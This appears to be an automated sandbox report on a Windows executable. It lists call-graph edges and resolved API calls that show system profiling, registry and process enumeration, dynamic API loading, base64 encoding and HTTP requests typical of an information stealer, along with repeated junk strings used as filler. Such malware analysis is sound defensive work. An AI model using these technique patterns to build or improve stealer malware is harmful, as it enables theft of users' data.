9a4848 InternetCrackUrlA 15609 9a4867 15608->15609 15609->14555 15611 9a4eee 15610->15611 15612 9a9af9 LocalAlloc 15610->15612 15611->14577 15611->14579 15612->15611 15613 9a9b14 CryptStringToBinaryA 15612->15613 15613->15611 15614 9a9b39 LocalFree 15613->15614 15614->15611 15616 9ba740 lstrcpy 15615->15616 15617 9b8b74 15616->15617 15618 9ba740 lstrcpy 15617->15618 15619 9b8b82 GetSystemTime 15618->15619 15620 9b8b99 15619->15620 15621 9ba7a0 lstrcpy 15620->15621 15622 9b8bfc 15621->15622 15622->14571 15624 9ba931 15623->15624 15625 9ba988 15624->15625 15627 9ba968 lstrcpy lstrcat 15624->15627 15626 9ba7a0 lstrcpy 15625->15626 15628 9ba994 15626->15628 15627->15625 15628->14574 15629->14689 15630->15608 15631->14699 15632->14840 15633->14842 15634->14850 15763 9b77a0 15635->15763 15638 9b1c1e 15638->14932 15639 9b76c6 RegOpenKeyExA 15640 9b76e7 RegQueryValueExA 15639->15640 15641 9b7704 RegCloseKey 15639->15641 15640->15641 15641->15638 15643 9b1c99 15642->15643 15643->14946 15645 9b1e09 15644->15645 15645->14988 15647 9b7a9a wsprintfA 15646->15647 15648 9b1e84 15646->15648 15647->15648 15648->15002 15650 9b7b4d 15649->15650 15651 9b1efe 15649->15651 15770 9b8d20 LocalAlloc CharToOemW 15650->15770 15651->15016 15654 9ba740 lstrcpy 15653->15654 15655 9b7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15654->15655 15664 9b7c25 15655->15664 15656 9b7d18 15658 9b7d28 15656->15658 15659 9b7d1e LocalFree 15656->15659 15657 9b7c46 GetLocaleInfoA 15657->15664 15661 9ba7a0 lstrcpy 15658->15661 15659->15658 15660 9ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15660->15664 15662 9b7d37 15661->15662 15662->15029 15663 9ba8a0 lstrcpy 15663->15664 15664->15656 15664->15657 15664->15660 15664->15663 15666 9b2008 15665->15666 15666->15044 15668 9b9493 GetModuleFileNameExA CloseHandle 15667->15668 15669 9b94b5 15667->15669 15668->15669 15670 9ba740 lstrcpy 15669->15670 15671 9b2091 15670->15671 15671->15059 15673 9b7e68 RegQueryValueExA 15672->15673 15674 9b2119 15672->15674 15675 9b7e8e RegCloseKey 15673->15675 15674->15073 15675->15674 15677 9b7fb9 GetLogicalProcessorInformationEx 15676->15677 15678 9b7fd8 GetLastError 15677->15678 15681 9b8029 15677->15681 15685 9b7fe3 15678->15685 15687 9b8022 15678->15687 15682 9b89f0 2 API calls 15681->15682 15684 9b807b 15682->15684 15683 9b89f0 2 API calls 15686 9b2194 15683->15686 15684->15687 15688 9b8084 wsprintfA 15684->15688 15685->15677 15685->15686 15771 9b89f0 15685->15771 15774 9b8a10 GetProcessHeap RtlAllocateHeap 15685->15774 15686->15087 15687->15683 15687->15686 15688->15686 15690 9b220f 15689->15690 15690->15101 15692 9b89b0 15691->15692 15693 9b814d GlobalMemoryStatusEx 15692->15693 15695 9b8163 __aulldiv 15693->15695 15694 9b819b wsprintfA 15696 9b2289 15694->15696 15695->15694 15696->15115 15698 9b87fb GetProcessHeap RtlAllocateHeap wsprintfA 15697->15698 15700 9ba740 lstrcpy 15698->15700 15701 9b230b 15700->15701 15701->15129 15703 9ba740 lstrcpy 15702->15703 15707 9b8229 15703->15707 15704 9b8263 15706 9ba7a0 lstrcpy 15704->15706 15705 9ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15705->15707 15708 9b82dc 15706->15708 15707->15704 15707->15705 15709 9ba8a0 lstrcpy 15707->15709 15708->15146 15709->15707 15711 9ba740 lstrcpy 15710->15711 15712 9b835c RegOpenKeyExA 15711->15712 15713 9b83ae 15712->15713 15714 9b83d0 15712->15714 15715 9ba7a0 lstrcpy 15713->15715 15716 9b83f8 RegEnumKeyExA 15714->15716 15717 9b8613 RegCloseKey 15714->15717 15726 9b83bd 15715->15726 15719 9b843f wsprintfA RegOpenKeyExA 15716->15719 15720 9b860e 15716->15720 15718 9ba7a0 lstrcpy 15717->15718 15718->15726 15721 9b84c1 RegQueryValueExA 15719->15721 15722 9b8485 RegCloseKey RegCloseKey 15719->15722 15720->15717 15723 9b84fa lstrlen 15721->15723 15724 9b8601 RegCloseKey 15721->15724 15725 9ba7a0 lstrcpy 15722->15725 15723->15724 15727 9b8510 15723->15727 15724->15720 15725->15726 15726->15172 15728 9ba9b0 4 API calls 15727->15728 15729 9b8527 15728->15729 15730 9ba8a0 lstrcpy 15729->15730 15731 9b8533 15730->15731 15732 9ba9b0 4 API calls 15731->15732 15733 9b8557 15732->15733 15734 9ba8a0 lstrcpy 15733->15734 15735 9b8563 15734->15735 15736 9b856e RegQueryValueExA 15735->15736 15736->15724 15737 9b85a3 15736->15737 15738 9ba9b0 4 API calls 15737->15738 15739 9b85ba 15738->15739 15740 9ba8a0 lstrcpy 15739->15740 15741 9b85c6 15740->15741 15742 9ba9b0 4 API calls 15741->15742 15743 9b85ea 15742->15743 15744 9ba8a0 lstrcpy 15743->15744 15745 9b85f6 15744->15745 15745->15724 15747 9ba740 lstrcpy 15746->15747 15748 9b86bc CreateToolhelp32Snapshot Process32First 15747->15748 15749 9b86e8 Process32Next 15748->15749 15750 9b875d CloseHandle 15748->15750 15749->15750 15755 9b86fd 15749->15755 15751 9ba7a0 lstrcpy 15750->15751 15753 9b8776 15751->15753 15752 9ba8a0 lstrcpy 15752->15755 15753->15204 15754 9ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15754->15755 15755->15749 15755->15752 15755->15754 15757 9ba7a0 lstrcpy 15756->15757 15758 9b51b5 15757->15758 15759 9a1590 lstrcpy 15758->15759 15760 9b51c6 15759->15760 15775 9a5100 15760->15775 15762 9b51cf 15762->15216 15766 9b7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15763->15766 15765 9b76b9 15765->15638 15765->15639 15767 9b7780 RegCloseKey 15766->15767 15768 9b7765 RegQueryValueExA 15766->15768 15769 9b7793 15767->15769 15768->15767 15769->15765 15770->15651 15772 9b89f9 GetProcessHeap HeapFree 15771->15772 15773 9b8a0c 15771->15773 15772->15773 15773->15685 15774->15685 15776 9ba7a0 lstrcpy 15775->15776 15777 9a5119 15776->15777 15778 9a47b0 2 API calls 15777->15778 15779 9a5125 15778->15779 15935 9b8ea0 15779->15935 15781 9a5184 15782 9a5192 lstrlen 15781->15782 15783 9a51a5 15782->15783 15784 9b8ea0 4 API calls 15783->15784 15785 9a51b6 15784->15785 15786 9ba740 lstrcpy 15785->15786 15787 9a51c9 15786->15787 15788 9ba740 lstrcpy 15787->15788 15789 9a51d6 15788->15789 15790 9ba740 lstrcpy 15789->15790 15791 9a51e3 15790->15791 15792 9ba740 lstrcpy 15791->15792 15793 9a51f0 15792->15793 15794 9ba740 lstrcpy 15793->15794 15795 9a51fd InternetOpenA StrCmpCA 15794->15795 15796 9a522f 15795->15796 15797 9a58c4 InternetCloseHandle 15796->15797 15798 9b8b60 3 API calls 15796->15798 15804 9a58d9 ctype 15797->15804 15799 9a524e 15798->15799 15800 9ba920 3 API calls 15799->15800 15801 9a5261 15800->15801 15802 9ba8a0 lstrcpy 15801->15802 15803 9a526a 15802->15803 15805 9ba9b0 4 API calls 15803->15805 15808 9ba7a0 lstrcpy 15804->15808 15806 9a52ab 15805->15806 15807 9ba920 3 API calls 15806->15807 15809 9a52b2 15807->15809 15816 9a5913 15808->15816 15810 9ba9b0 4 API calls 15809->15810 15811 9a52b9 15810->15811 15812 9ba8a0 lstrcpy 15811->15812 15813 9a52c2 15812->15813 15814 9ba9b0 4 API calls 15813->15814 15815 9a5303 15814->15815 15817 9ba920 3 API calls 15815->15817 15816->15762 15818 9a530a 15817->15818 15819 9ba8a0 lstrcpy 15818->15819 15820 9a5313 15819->15820 15821 9a5329 InternetConnectA 15820->15821 15821->15797 15822 9a5359 HttpOpenRequestA 15821->15822 15824 9a58b7 InternetCloseHandle 15822->15824 15825 9a53b7 15822->15825 15824->15797 15826 9ba9b0 4 API calls 15825->15826 15827 9a53cb 15826->15827 15828 9ba8a0 lstrcpy 15827->15828 15829 9a53d4 15828->15829 15830 9ba920 3 API calls 15829->15830 15831 9a53f2 15830->15831 15832 9ba8a0 lstrcpy 15831->15832 15833 9a53fb 15832->15833 15834 9ba9b0 4 API calls 15833->15834 15835 9a541a 15834->15835 15836 9ba8a0 lstrcpy 15835->15836 15837 9a5423 15836->15837 15838 9ba9b0 4 API calls 15837->15838 15839 9a5444 15838->15839 15840 9ba8a0 lstrcpy 15839->15840 15841 9a544d 15840->15841 15842 9ba9b0 4 API calls 15841->15842 15843 9a546e 15842->15843 15844 9ba8a0 lstrcpy 15843->15844 15936 9b8ea9 15935->15936 15937 9b8ead CryptBinaryToStringA 15935->15937 15936->15781 15937->15936 15938 9b8ece GetProcessHeap RtlAllocateHeap 15937->15938 15938->15936 15939 9b8ef4 ctype 15938->15939 15940 9b8f05 CryptBinaryToStringA 15939->15940 15940->15936 15944->15219 16187 9a9880 15945->16187 15947 9a98e1 15947->15226 15949 9ba740 lstrcpy 15948->15949 15950 9afb16 15949->15950 16122 9ba740 lstrcpy 16121->16122 16123 9b0266 16122->16123 16124 9b8de0 2 API calls 16123->16124 16125 9b027b 16124->16125 16126 9ba920 3 API calls 16125->16126 16127 9b028b 16126->16127 16128 9ba8a0 lstrcpy 16127->16128 16129 9b0294 16128->16129 16130 9ba9b0 4 API calls 16129->16130 16131 9b02b8 16130->16131 16188 9a988e 16187->16188 16191 9a6fb0 16188->16191 16190 9a98ad ctype 16190->15947 16194 9a6d40 16191->16194 16195 9a6d63 16194->16195 16206 9a6d59 16194->16206 16195->16206 16208 9a6660 16195->16208 16197 9a6dbe 16197->16206 16214 9a69b0 16197->16214 16199 9a6e2a 16200 9a6ee6 VirtualFree 16199->16200 16202 9a6ef7 16199->16202 16199->16206 16200->16202 16201 9a6f41 16203 9b89f0 2 API calls 16201->16203 16201->16206 16202->16201 16204 9a6f38 16202->16204 16205 9a6f26 FreeLibrary 16202->16205 16203->16206 16207 9b89f0 2 API calls 16204->16207 16205->16202 16206->16190 16207->16201 16211 9a668f VirtualAlloc 16208->16211 16210 9a6730 16212 9a673c 16210->16212 16213 9a6743 VirtualAlloc 16210->16213 16211->16210 16211->16212 16212->16197 16213->16212 16215 9a69c9 16214->16215 16218 9a69d5 16214->16218 16216 9a6a09 LoadLibraryA 16215->16216 16215->16218 16217 9a6a32 16216->16217 16216->16218 16220 9a6ae0 16217->16220 16224 9b8a10 GetProcessHeap RtlAllocateHeap 16217->16224 16218->16199 16220->16218 16221 9a6ba8 GetProcAddress 16220->16221 16221->16218 16221->16220 16222 9b89f0 2 API calls 16222->16220 16223 9a6a8b 16223->16218 16223->16222 16224->16223

                  Executed Functions

                  Function 009B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 9b9860-9b9874 call 9b9750 663 9b987a-9b9a8e call 9b9780 GetProcAddress * 21 660->663 664 9b9a93-9b9af2 LoadLibraryA * 5 660->664 663->664 666 9b9b0d-9b9b14 664->666 667 9b9af4-9b9b08 GetProcAddress 664->667 669 9b9b46-9b9b4d 666->669 670 9b9b16-9b9b41 GetProcAddress * 2 666->670 667->666 671 9b9b68-9b9b6f 669->671 672 9b9b4f-9b9b63 GetProcAddress 669->672 670->669 673 9b9b89-9b9b90 671->673 674 9b9b71-9b9b84 GetProcAddress 671->674 672->671 675 9b9b92-9b9bbc GetProcAddress * 2 673->675 676 9b9bc1-9b9bc2 673->676 674->673 675->676
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,015E3060), ref: 009B98A1
                  • GetProcAddress.KERNEL32(74DD0000,015E2F40), ref: 009B98BA
                  • GetProcAddress.KERNEL32(74DD0000,015E30D8), ref: 009B98D2
                  • GetProcAddress.KERNEL32(74DD0000,015E3030), ref: 009B98EA
                  • GetProcAddress.KERNEL32(74DD0000,015E3108), ref: 009B9903
                  • GetProcAddress.KERNEL32(74DD0000,015E9CD8), ref: 009B991B
                  • GetProcAddress.KERNEL32(74DD0000,015D6F30), ref: 009B9933
                  • GetProcAddress.KERNEL32(74DD0000,015D6F70), ref: 009B994C
                  • GetProcAddress.KERNEL32(74DD0000,015E2FD0), ref: 009B9964
                  • GetProcAddress.KERNEL32(74DD0000,015E3048), ref: 009B997C
                  • GetProcAddress.KERNEL32(74DD0000,015E3000), ref: 009B9995
                  • GetProcAddress.KERNEL32(74DD0000,015E2FB8), ref: 009B99AD
                  • GetProcAddress.KERNEL32(74DD0000,015D6DB0), ref: 009B99C5
                  • GetProcAddress.KERNEL32(74DD0000,015E2FE8), ref: 009B99DE
                  • GetProcAddress.KERNEL32(74DD0000,015E3078), ref: 009B99F6
                  • GetProcAddress.KERNEL32(74DD0000,015D7050), ref: 009B9A0E
                  • GetProcAddress.KERNEL32(74DD0000,015E30F0), ref: 009B9A27
                  • GetProcAddress.KERNEL32(74DD0000,015E3090), ref: 009B9A3F
                  • GetProcAddress.KERNEL32(74DD0000,015D6DD0), ref: 009B9A57
                  • GetProcAddress.KERNEL32(74DD0000,015E2EF8), ref: 009B9A70
                  • GetProcAddress.KERNEL32(74DD0000,015D6FB0), ref: 009B9A88
                  • LoadLibraryA.KERNEL32(015E30A8,?,009B6A00), ref: 009B9A9A
                  • LoadLibraryA.KERNEL32(015E3120,?,009B6A00), ref: 009B9AAB
                  • LoadLibraryA.KERNEL32(015E3138,?,009B6A00), ref: 009B9ABD
                  • LoadLibraryA.KERNEL32(015E3198,?,009B6A00), ref: 009B9ACF
                  • LoadLibraryA.KERNEL32(015E31B0,?,009B6A00), ref: 009B9AE0
                  • GetProcAddress.KERNEL32(75A70000,015E3150), ref: 009B9B02
                  • GetProcAddress.KERNEL32(75290000,015E31C8), ref: 009B9B23
                  • GetProcAddress.KERNEL32(75290000,015E2F10), ref: 009B9B3B
                  • GetProcAddress.KERNEL32(75BD0000,015E2F28), ref: 009B9B5D
                  • GetProcAddress.KERNEL32(75450000,015D6DF0), ref: 009B9B7E
                  • GetProcAddress.KERNEL32(76E90000,015E9C68), ref: 009B9B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 009B9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 009B9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 1754d24ad8e615fdb5fbc647667949b8a8940382955a343d64b8f0554bad1acb
                  • Instruction ID: 71c74f74988776f038634bdaafb95a0579f970e4602478719133312ef5d9b3f6
                  • Opcode Fuzzy Hash: 1754d24ad8e615fdb5fbc647667949b8a8940382955a343d64b8f0554bad1acb
                  • Instruction Fuzzy Hash: 7DA11BB95102C09FD354EFA8EDC8A563BFDF788301705851EA605CB264DE39B881DB63
                  Function 009A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 9a45c0-9a4695 RtlAllocateHeap 781 9a46a0-9a46a6 764->781 782 9a474f-9a47a9 VirtualProtect 781->782 783 9a46ac-9a474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009A479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A45F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A46C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A46AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A46D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A46CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A46B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A45DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A45D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A45E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A45C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009A4617
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 194d1042ef4692720d8df5bb649167036bed7fa5edcb578a89335df5017e8b69
                  • Instruction ID: b0f3c9992c98dc9b05b0c697bc0a99f48e6889b7d10b7102d52bf7ee7496a1c5
                  • Opcode Fuzzy Hash: 194d1042ef4692720d8df5bb649167036bed7fa5edcb578a89335df5017e8b69
                  • Instruction Fuzzy Hash: C4410460BD16456BCF24F7B4896DFAD76665FC2718BC9B28CEC6052280CAB065C0C5EF
                  Function 009A6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • InternetOpenA.WININET(009C0DFE,00000001,00000000,00000000,00000000), ref: 009A62E1
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009A63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009A63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009A646D
                  • InternetCloseHandle.WININET(00000000), ref: 009A64EF
                  • InternetCloseHandle.WININET(00000000), ref: 009A64F9
                  • InternetCloseHandle.WININET(00000000), ref: 009A6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
